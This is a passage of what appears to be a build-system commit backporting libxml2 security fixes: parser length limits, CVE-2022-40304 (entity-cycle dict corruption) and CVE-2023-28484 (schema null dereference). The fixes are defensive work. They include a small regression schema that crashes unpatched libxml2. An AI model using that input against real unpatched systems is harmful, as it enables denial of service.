+ #define XML_PARSER_LOT_ENTITY 5000
+
+@@ -552,7 +554,7 @@ xmlFatalErr(xmlParserCtxtPtr ctxt, xmlParserErrors error, const char *info)
+ errmsg = "Malformed declaration expecting version";
+ break;
+ case XML_ERR_NAME_TOO_LONG:
+- errmsg = "Name too long use XML_PARSE_HUGE option";
++ errmsg = "Name too long";
+ break;
+ #if 0
+ case:
+@@ -3202,6 +3204,9 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNameComplex++;
+@@ -3267,7 +3272,8 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+@@ -3293,13 +3299,13 @@ xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3338,7 +3344,10 @@ const xmlChar *
+ xmlParseName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ GROW;
+
+@@ -3362,8 +3371,7 @@ xmlParseName(xmlParserCtxtPtr ctxt) {
+ in++;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Name");
+ return(NULL);
+ }
+@@ -3384,6 +3392,9 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ size_t startPosition = 0;
+
+ #ifdef DEBUG
+@@ -3404,17 +3415,13 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ while ((c != ' ') && (c != '>') && (c != '/') && /* test bigname.xml */
+ (xmlIsNameChar(ctxt, c) && (c != ':'))) {
+ if (count++ > XML_PARSER_CHUNK_SIZE) {
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- return(NULL);
+- }
+ count = 0;
+ GROW;
+ if (ctxt->instate == XML_PARSER_EOF)
+ return(NULL);
+ }
+- len += l;
++ if (len <= INT_MAX - l)
++ len += l;
+ NEXTL(l);
+ c = CUR_CHAR(l);
+ if (c == 0) {
+@@ -3432,8 +3439,7 @@ xmlParseNCNameComplex(xmlParserCtxtPtr ctxt) {
+ c = CUR_CHAR(l);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3459,7 +3465,10 @@ static const xmlChar *
+ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ const xmlChar *in, *e;
+ const xmlChar *ret;
+- int count = 0;
++ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNCName++;
+@@ -3484,8 +3493,7 @@ xmlParseNCName(xmlParserCtxtPtr ctxt) {
+ goto complex;
+ if ((*in > 0) && (*in < 0x80)) {
+ count = in - ctxt->input->cur;
+- if ((count > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (count > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3567,6 +3575,9 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ const xmlChar *cur = *str;
+ int len = 0, l;
+ int c;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseStringName++;
+@@ -3602,12 +3613,6 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3621,14 +3626,18 @@ xmlParseStringName(xmlParserCtxtPtr ctxt, const xmlChar** str) {
+ COPY_BUF(l,buffer,len,c);
+ cur += l;
+ c = CUR_SCHAR(cur, l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ *str = cur;
+ return(buffer);
+ }
+ }
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NCName");
+ return(NULL);
+ }
+@@ -3655,6 +3664,9 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ int len = 0, l;
+ int c;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+
+ #ifdef DEBUG
+ nbParseNmToken++;
+@@ -3706,12 +3718,6 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ if (len + 10 > max) {
+ xmlChar *tmp;
+
+- if ((max > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+- xmlFree(buffer);
+- return(NULL);
+- }
+ max *= 2;
+ tmp = (xmlChar *) xmlRealloc(buffer,
+ max * sizeof(xmlChar));
+@@ -3725,6 +3731,11 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ COPY_BUF(l,buffer,len,c);
+ NEXTL(l);
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
++ xmlFree(buffer);
++ return(NULL);
++ }
+ }
+ buffer[len] = 0;
+ return(buffer);
+@@ -3732,8 +3743,7 @@ xmlParseNmtoken(xmlParserCtxtPtr ctxt) {
+ }
+ if (len == 0)
+ return(NULL);
+- if ((len > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "NmToken");
+ return(NULL);
+ }
+@@ -3759,6 +3769,9 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int c, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlChar stop;
+ xmlChar *ret = NULL;
+ const xmlChar *cur = NULL;
+@@ -3818,6 +3831,12 @@ xmlParseEntityValue(xmlParserCtxtPtr ctxt, xmlChar **orig) {
+ GROW;
+ c = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ENTITY_NOT_FINISHED,
++ "entity value too long\n");
++ goto error;
++ }
+ }
+ buf[len] = 0;
+ if (ctxt->instate == XML_PARSER_EOF)
+@@ -3905,6 +3924,9 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ xmlChar *rep = NULL;
+ size_t len = 0;
+ size_t buf_size = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int c, l, in_space = 0;
+ xmlChar *current = NULL;
+ xmlEntityPtr ent;
+@@ -3925,16 +3925,6 @@
+ while (((NXT(0) != limit) && /* checked */
+ (IS_CHAR(c)) && (c != '<')) &&
+ (ctxt->instate != XML_PARSER_EOF)) {
+- /*
+- * Impose a reasonable limit on attribute size, unless XML_PARSE_HUGE
+- * special option is given
+- */
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+ if (c == 0) break;
+ if (c == '&') {
+ in_space = 0;
+@@ -4093,6 +4105,11 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ }
+ GROW;
+ c = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
++ "AttValue length too long\n");
++ goto mem_error;
++ }
+ }
+ if (ctxt->instate == XML_PARSER_EOF)
+ goto error;
+@@ -4114,16 +4131,6 @@ xmlParseAttValueComplex(xmlParserCtxtPtr ctxt, int *attlen, int normalize) {
+ } else
+ NEXT;
+
+- /*
+- * There we potentially risk an overflow, don't allow attribute value of
+- * length more than INT_MAX it is a very reasonable assumption !
+- */
+- if (len >= INT_MAX) {
+- xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+- "AttValue length too long\n");
+- goto mem_error;
+- }
+-
+ if (attlen != NULL) *attlen = (int) len;
+ return(buf);
+
+@@ -4194,6 +4201,9 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
+ int cur, l;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar stop;
+ int state = ctxt->instate;
+ int count = 0;
+@@ -4221,13 +4231,6 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
+- xmlFree(buf);
+- ctxt->instate = (xmlParserInputState) state;
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4256,6 +4259,12 @@ xmlParseSystemLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "SystemLiteral");
++ xmlFree(buf);
++ ctxt->instate = (xmlParserInputState) state;
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = (xmlParserInputState) state;
+@@ -4283,6 +4292,9 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ int len = 0;
+ int size = XML_PARSER_BUFFER_SIZE;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_TEXT_LENGTH :
++ XML_MAX_NAME_LENGTH;
+ xmlChar cur;
+ xmlChar stop;
+ int count = 0;
+@@ -4310,12 +4322,6 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ if (len + 1 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_NAME_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
+- xmlFree(buf);
+- return(NULL);
+- }
+ size *= 2;
+ tmp = (xmlChar *) xmlRealloc(buf, size * sizeof(xmlChar));
+ if (tmp == NULL) {
+@@ -4343,6 +4349,11 @@ xmlParsePubidLiteral(xmlParserCtxtPtr ctxt) {
+ SHRINK;
+ cur = CUR;
+ }
++ if (len > maxLength) {
++ xmlFatalErr(ctxt, XML_ERR_NAME_TOO_LONG, "Public ID");
++ xmlFree(buf);
++ return(NULL);
++ }
+ }
+ buf[len] = 0;
+ if (cur != stop) {
+@@ -4742,6 +4753,9 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ int r, rl;
+ int cur, l;
+ size_t count = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int inputid;
+
+ inputid = ctxt->input->id;
+@@ -4787,13 +4801,6 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ if ((r == '-') && (q == '-')) {
+ xmlFatalErr(ctxt, XML_ERR_HYPHEN_IN_COMMENT, NULL);
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+- "Comment too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ if (len + 5 >= size) {
+ xmlChar *new_buf;
+ size_t new_size;
+@@ -4831,6 +4838,13 @@ xmlParseCommentComplex(xmlParserCtxtPtr ctxt, xmlChar *buf,
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
++ "Comment too big found", NULL);
++ xmlFree (buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ if (cur == 0) {
+@@ -4875,6 +4889,9 @@ xmlParseComment(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t size = XML_PARSER_BUFFER_SIZE;
+ size_t len = 0;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ xmlParserInputState state;
+ const xmlChar *in;
+ size_t nbchar = 0;
+@@ -4958,8 +4975,7 @@ get_more:
+ buf[len] = 0;
+ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if (len > maxLength) {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_COMMENT_NOT_FINISHED,
+ "Comment too big found", NULL);
+ xmlFree (buf);
+@@ -5159,6 +5175,9 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ xmlChar *buf = NULL;
+ size_t len = 0;
+ size_t size = XML_PARSER_BUFFER_SIZE;
++ size_t maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+ int cur, l;
+ const xmlChar *target;
+ xmlParserInputState state;
+@@ -5234,14 +5253,6 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ return;
+ }
+ count = 0;
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ }
+ COPY_BUF(l,buf,len,cur);
+ NEXTL(l);
+@@ -5251,15 +5262,14 @@ xmlParsePI(xmlParserCtxtPtr ctxt) {
+ GROW;
+ cur = CUR_CHAR(l);
+ }
++ if (len > maxLength) {
++ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
++ "PI %s too big found", target);
++ xmlFree(buf);
++ ctxt->instate = state;
++ return;
++ }
+ }
+- if ((len > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+- "PI %s too big found", target);
+- xmlFree(buf);
+- ctxt->instate = state;
+- return;
+- }
+ buf[len] = 0;
+ if (cur != '?') {
+ xmlFatalErrMsgStr(ctxt, XML_ERR_PI_NOT_FINISHED,
+@@ -8954,6 +8964,9 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ const xmlChar *in = NULL, *start, *end, *last;
+ xmlChar *ret = NULL;
+ int line, col;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ GROW;
+ in = (xmlChar *) CUR_PTR;
+@@ -8993,8 +9006,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ start = in;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9007,8 +9019,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ if ((*in++ == 0x20) && (*in == 0x20)) break;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9041,16 +9052,14 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ last = last + delta;
+ }
+ end = ctxt->input->end;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+ }
+ }
+ }
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9063,8 +9072,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ col++;
+ if (in >= end) {
+ GROW_PARSE_ATT_VALUE_INTERNAL(ctxt, in, start, end)
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9072,8 +9080,7 @@ xmlParseAttValueInternal(xmlParserCtxtPtr ctxt, int *len, int *alloc,
+ }
+ }
+ last = in;
+- if (((in - start) > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
++ if ((in - start) > maxLength) {
+ xmlFatalErrMsg(ctxt, XML_ERR_ATTRIBUTE_NOT_FINISHED,
+ "AttValue length too long\n");
+ return(NULL);
+@@ -9763,6 +9770,9 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ int s, sl;
+ int cur, l;
+ int count = 0;
++ int maxLength = (ctxt->options & XML_PARSE_HUGE) ?
++ XML_MAX_HUGE_LENGTH :
++ XML_MAX_TEXT_LENGTH;
+
+ /* Check 2.6.0 was NXT(0) not RAW */
+ if (CMP9(CUR_PTR, '<', '!', '[', 'C', 'D', 'A', 'T', 'A', '[')) {
+@@ -9796,13 +9806,6 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ if (len + 5 >= size) {
+ xmlChar *tmp;
+
+- if ((size > XML_MAX_TEXT_LENGTH) &&
+- ((ctxt->options & XML_PARSE_HUGE) == 0)) {
+- xmlFatalErrMsgStr(ctxt, XML_ERR_CDATA_NOT_FINISHED,
+- "CData section too big found", NULL);
+- xmlFree (buf);
+- return;
+- }
+ tmp = (xmlChar *) xmlRealloc(buf, size * 2 * sizeof(xmlChar));
+ if (tmp == NULL) {
+ xmlFree(buf);
+@@ -9829,6 +9832,12 @@ xmlParseCDSect(xmlParserCtxtPtr ctxt) {
+ }
+ NEXTL(l);
+ cur = CUR_CHAR(l);
++ if (len > maxLength) {
++ xmlFatalErrMsg(ctxt, XML_ERR_CDATA_NOT_FINISHED,
++ "CData section too big found\n");
++ xmlFree(buf);
++ return;
++ }
+ }
+ buf[len] = 0;
+ ctxt->instate = XML_PARSER_CONTENT;
+--
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
new file mode 100644
index 0000000000..c19726fe9f
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch
@@ -0,0 +1,104 @@
+From 1b41ec4e9433b05bb0376be4725804c54ef1d80b Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Wed, 31 Aug 2022 22:11:25 +0200
+Subject: [PATCH] [CVE-2022-40304] Fix dict corruption caused by entity
+ reference cycles
+
+When an entity reference cycle is detected, the entity content is
+cleared by setting its first byte to zero. But the entity content might
+be allocated from a dict. In this case, the dict entry becomes corrupted
+leading to all kinds of logic errors, including memory errors like
+double-frees.
+
+Stop storing entity content, orig, ExternalID and SystemID in a dict.
+These values are unlikely to occur multiple times in a document, so they
+shouldn't have been stored in a dict in the first place.
+
+Thanks to Ned Williamson and Nathan Wachholz working with Google Project
+Zero for the report!
+
+CVE: CVE-2022-40304
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1b41ec4e9433b05bb0376be4725804c54ef1d80b]
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+---
+ entities.c | 55 ++++++++++++++++--------------------------------------
+ 1 file changed, 16 insertions(+), 39 deletions(-)
+
+diff --git a/entities.c b/entities.c
+index 84435515..d4e5412e 100644
+--- a/entities.c
++++ b/entities.c
+@@ -128,36 +128,19 @@ xmlFreeEntity(xmlEntityPtr entity)
+ if ((entity->children) && (entity->owner == 1) &&
+ (entity == (xmlEntityPtr) entity->children->parent))
+ xmlFreeNodeList(entity->children);
+- if (dict != NULL) {
+- if ((entity->name != NULL) && (!xmlDictOwns(dict, entity->name)))
+- xmlFree((char *) entity->name);
+- if ((entity->ExternalID != NULL) &&
+- (!xmlDictOwns(dict, entity->ExternalID)))
+- xmlFree((char *) entity->ExternalID);
+- if ((entity->SystemID != NULL) &&
+- (!xmlDictOwns(dict, entity->SystemID)))
+- xmlFree((char *) entity->SystemID);
+- if ((entity->URI != NULL) && (!xmlDictOwns(dict, entity->URI)))
+- xmlFree((char *) entity->URI);
+- if ((entity->content != NULL)
+- && (!xmlDictOwns(dict, entity->content)))
+- xmlFree((char *) entity->content);
+- if ((entity->orig != NULL) && (!xmlDictOwns(dict, entity->orig)))
+- xmlFree((char *) entity->orig);
+- } else {
+- if (entity->name != NULL)
+- xmlFree((char *) entity->name);
+- if (entity->ExternalID != NULL)
+- xmlFree((char *) entity->ExternalID);
+- if (entity->SystemID != NULL)
+- xmlFree((char *) entity->SystemID);
+- if (entity->URI != NULL)
+- xmlFree((char *) entity->URI);
+- if (entity->content != NULL)
+- xmlFree((char *) entity->content);
+- if (entity->orig != NULL)
+- xmlFree((char *) entity->orig);
+- }
++ if ((entity->name != NULL) &&
++ ((dict == NULL) || (!xmlDictOwns(dict, entity->name))))
++ xmlFree((char *) entity->name);
++ if (entity->ExternalID != NULL)
++ xmlFree((char *) entity->ExternalID);
++ if (entity->SystemID != NULL)
++ xmlFree((char *) entity->SystemID);
++ if (entity->URI != NULL)
++ xmlFree((char *) entity->URI);
++ if (entity->content != NULL)
++ xmlFree((char *) entity->content);
++ if (entity->orig != NULL)
++ xmlFree((char *) entity->orig);
+ xmlFree(entity);
+ }
+
+@@ -193,18 +176,12 @@ xmlCreateEntity(xmlDictPtr dict, const xmlChar *name, int type,
+ ret->SystemID = xmlStrdup(SystemID);
+ } else {
+ ret->name = xmlDictLookup(dict, name, -1);
+- if (ExternalID != NULL)
+- ret->ExternalID = xmlDictLookup(dict, ExternalID, -1);
+- if (SystemID != NULL)
+- ret->SystemID = xmlDictLookup(dict, SystemID, -1);
++ ret->ExternalID = xmlStrdup(ExternalID);
++ ret->SystemID = xmlStrdup(SystemID);
+ }
+ if (content != NULL) {
+ ret->length = xmlStrlen(content);
+- if ((dict != NULL) && (ret->length < 5))
+- ret->content = (xmlChar *)
+- xmlDictLookup(dict, content, ret->length);
+- else
+- ret->content = xmlStrndup(content, ret->length);
++ ret->content = xmlStrndup(content, ret->length);
+ } else {
+ ret->length = 0;
+ ret->content = NULL;
+--
+GitLab
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
new file mode 100644
index 0000000000..907f2c4d47
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch
@@ -0,0 +1,79 @@
+From e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68 Mon Sep 17 00:00:00 2001
+From: Nick Wellnhofer <wellnhofer@aevum.de>
+Date: Fri, 7 Apr 2023 11:46:35 +0200
+Subject: [PATCH] [CVE-2023-28484] Fix null deref in xmlSchemaFixupComplexType
+
+Fix a null pointer dereference when parsing (invalid) XML schemas.
+
+Thanks to Robby Simpson for the report!
+
+Fixes #491.
+
+CVE: CVE-2023-28484
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/e4f85f1bd2eb34d9b49da9154a4cc3a1bc284f68]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ result/schemas/issue491_0_0.err | 1 +
+ test/schemas/issue491_0.xml | 1 +
+ test/schemas/issue491_0.xsd | 18 ++++++++++++++++++
+ xmlschemas.c | 2 +-
+ 4 files changed, 21 insertions(+), 1 deletion(-)
+ create mode 100644 result/schemas/issue491_0_0.err
+ create mode 100644 test/schemas/issue491_0.xml
+ create mode 100644 test/schemas/issue491_0.xsd
+
+diff --git a/result/schemas/issue491_0_0.err b/result/schemas/issue491_0_0.err
+new file mode 100644
+index 00000000..9b2bb969
+--- /dev/null
++++ b/result/schemas/issue491_0_0.err
+@@ -0,0 +1 @@
++./test/schemas/issue491_0.xsd:8: element complexType: Schemas parser error : complex type 'ChildType': The content type of both, the type and its base type, must either 'mixed' or 'element-only'.
+diff --git a/test/schemas/issue491_0.xml b/test/schemas/issue491_0.xml
+new file mode 100644
+index 00000000..e2b2fc2e
+--- /dev/null
++++ b/test/schemas/issue491_0.xml
+@@ -0,0 +1 @@
++<Child xmlns="http://www.test.com">5</Child>
+diff --git a/test/schemas/issue491_0.xsd b/test/schemas/issue491_0.xsd
+new file mode 100644
+index 00000000..81702649
+--- /dev/null
++++ b/test/schemas/issue491_0.xsd
+@@ -0,0 +1,18 @@
++<?xml version='1.0' encoding='UTF-8'?>
++<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns="http://www.test.com" targetNamespace="http://www.test.com" elementFormDefault="qualified" attributeFormDefault="unqualified">
++ <xs:complexType name="BaseType">
++ <xs:simpleContent>
++ <xs:extension base="xs:int" />
++ </xs:simpleContent>
++ </xs:complexType>
++ <xs:complexType name="ChildType">
++ <xs:complexContent>
++ <xs:extension base="BaseType">
++ <xs:sequence>
++ <xs:element name="bad" type="xs:int" minOccurs="0" maxOccurs="1"/>
++ </xs:sequence>
++ </xs:extension>
++ </xs:complexContent>
++ </xs:complexType>
++ <xs:element name="Child" type="ChildType" />
++</xs:schema>
+diff --git a/xmlschemas.c b/xmlschemas.c
+index 6a353858..a4eaf591 100644
+--- a/xmlschemas.c
++++ b/xmlschemas.c
+@@ -18632,7 +18632,7 @@ xmlSchemaFixupComplexType(xmlSchemaParserCtxtPtr pctxt,
+ "allowed to appear inside other model groups",
+ NULL, NULL);
+
+- } else if (! dummySequence) {
++ } else if ((!dummySequence) && (baseType->subtypes != NULL)) {
